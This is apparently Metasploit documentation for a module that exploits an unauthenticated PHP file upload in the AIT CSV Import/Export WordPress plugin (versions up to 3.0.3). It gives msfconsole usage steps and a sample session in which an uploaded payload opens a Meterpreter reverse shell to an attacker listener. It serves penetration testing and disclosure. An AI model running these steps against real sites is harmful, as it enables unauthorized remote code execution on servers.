h00die
1.8 KiB
1.8 KiB
Vulnerable Application
The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated
remote attackers to upload and execute arbitrary PHP code. The
upload-handler does not require authentication, nor validates the
uploaded content. It may return an error when attempting to parse a
CSV, however the uploaded shell is left. The shell is uploaded to
wp-content/uploads/.
The plugin is not free and can be downloaded from https://www.ait-themes.club/wordpress-plugins/csv-import-export/. Once uploaded, the plugin does NOT need to be activated to be exploitable, just installed.
Verification Steps
- Install the plugin
- Start msfconsole
- Do:
use exploits/multi/http/wp_ait_csv_rce - Do:
set rhost [ip] - Do:
set lhost [ip] - Do:
run - You should get a shell.
Options
Scenarios
AIT CSV Import / Export 3.0.3 on Wordpress 5.4.4 running on Ubuntu 20.04.
[*] Processing ait.rb for ERB directives.
resource (ait.rb)> use exploits/multi/http/wp_ait_csv_rce
[*] Using configured payload php/meterpreter/reverse_tcp
resource (ait.rb)> set rhost 2.2.2.2
rhost => 2.2.2.2
resource (ait.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (ait.rb)> check
[*] 2.2.2.2:80 - The target appears to be vulnerable.
resource (ait.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading payload: W1I6X0.php
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41504) at 2021-01-01 11:56:16 -0500
[+] Deleted W1I6X0.php
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : wordpress2004
OS : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
Meterpreter : php/linux